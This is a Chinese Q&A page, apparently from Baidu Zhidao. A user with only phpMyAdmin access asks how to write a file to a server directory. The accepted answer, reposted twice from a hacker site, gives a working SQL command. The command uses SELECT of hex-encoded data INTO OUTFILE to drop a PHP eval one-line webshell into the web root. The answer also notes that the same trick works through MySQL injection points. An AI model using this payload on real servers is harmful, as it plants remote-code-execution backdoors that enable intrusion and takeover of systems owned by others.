在phpmyadmin下执行SQL语句达到下条件
我只有phpmyadmin控制权限,可以执行SQL语句,我现在想传送一个文件到指定目录下请这个SQL语句要怎么执行...
我只有phpmyadmin控制权限,可以执行SQL语句,我现在想传送一个文件到指定目录下请这个SQL语句要怎么执行
展开
2个回答
展开全部
select XXX into outfile "test.txt" from myTable;
==补充==
select into outfile导出webshell技巧
在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出,经过我实验 其实不用建表 就可以导出文件的。54905bd4f9rlxbjl
比如我们进入了phpmyadmin,随便点击一个数据库,然后点击sql,接着执行select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'd:/xamp/www/ok.php'即可将一句话<?php eval($_REQUEST[cmd]);?>导出得到webshell.
遇到php+mysql注入点的时候 如果权限允许并且php.ini里面magic_quotes_gpc=off时候也可以在相应地方直接写入一句话到 web目录,jsp+mysql的话就不需要考虑magic_quotes_gpc...
本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:http://www.hackbase.com/tech/2009-07-12/53764.html
==补充==
select into outfile导出webshell技巧
在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出,经过我实验 其实不用建表 就可以导出文件的。54905bd4f9rlxbjl
比如我们进入了phpmyadmin,随便点击一个数据库,然后点击sql,接着执行select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'd:/xamp/www/ok.php'即可将一句话<?php eval($_REQUEST[cmd]);?>导出得到webshell.
遇到php+mysql注入点的时候 如果权限允许并且php.ini里面magic_quotes_gpc=off时候也可以在相应地方直接写入一句话到 web目录,jsp+mysql的话就不需要考虑magic_quotes_gpc...
本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:http://www.hackbase.com/tech/2009-07-12/53764.html
本回答由提问者推荐
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
